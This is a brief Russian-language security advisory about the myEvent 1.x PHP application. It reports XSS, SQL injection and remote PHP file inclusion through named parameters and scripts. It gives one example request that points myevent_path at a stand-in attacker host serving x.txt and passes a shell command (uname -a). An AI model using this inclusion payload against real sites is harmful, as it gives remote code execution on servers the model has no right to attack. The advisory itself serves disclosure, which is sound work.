Программа: myEvent 1.x
 
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS
нападение, SQL-инъекцию и скомпрометировать уязвимую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "event_desc" в сценарии addevent.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный код сценария в
браузере жертвы в контексте безопасности уязвимого сайта.

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "event_id" в сценариях addevent.php и del.php, и параметре "event_desc"
в сценарии addevent.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

3. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "myevent_path" в сценариях myevent.php и initialize.php, и параметре "myevent_path"
в сценариях event.php и viewevent.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольный PHP сценарий на
системе с привилегиями Web сервера.

Удачная эксплуатация уязвимости возможна при включенной опции "register_globals"
и выключенной "magic_quotes_gpc".

Пример:

http://victim/[path]/initialize.php?myevent_path=http://www.evilsite.com/x.txt?&cmd=uname
-a
 



Оставить мнение